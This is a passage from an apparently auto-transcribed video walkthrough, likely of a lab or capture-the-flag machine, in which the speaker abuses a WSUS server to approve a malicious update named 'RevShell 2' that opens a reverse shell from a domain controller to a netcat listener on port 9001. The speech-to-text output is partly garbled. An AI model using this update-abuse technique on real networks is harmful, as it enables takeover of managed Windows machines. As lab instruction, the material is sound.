this console to see if one comes up. But I'm just going to disconnect, get rid of the /F, so it's just in a window. And then we can do the update here. Let's check, approve, create. So I'm going to create RevShell 2. So it says it has been created. Now, if I go here, there should be a way to find this update. But I don't see it. So this may be a failed beyond root. Downstream servers. Refresh. Let's see, options, what are these? That's not it. It's definitely got to be this. Unapproved, any. There we go. So we can see the update here. I don't know why we can't view it. I guess we're missing some type of package. But if we approve it here, it will send us the reverse shell. That's pretty much doing the same thing here. I think the difference being when we approve it in this, it's also going to approve it to a group, which this one does not do. But if I change this to install, where is it? Approve, RevShell 2. We'll just change the update ID. And then it's going to probably go in no man's land where we can't see it. Okay, it's been approved. We refresh. We no longer see it. Refresh here. Oh, we see it here. So, it's waiting to be sent out. I bet if I somehow refresh this, we'll see a RevShell 2 group. There we go. And if we look, any status any, we see DC updated. It says one update has not been installed. Let's see. You can see LVNP 9001. Move it over here. And as soon as we get the shell, you'll see it install here. But Yeah, it just takes a while for the check-in to happen. I hope this is beneficial, seeing exactly what WSUS is, but there we go. It's there. Going to refresh. Installed. It no longer has the arrow. This is a janky install of WSUS, but WSUS is always going to be janky. Approved is gone. It's just not in here anymore, which is odd. But yeah. Hope you guys enjoyed the video. Take care, and I will see you all next week.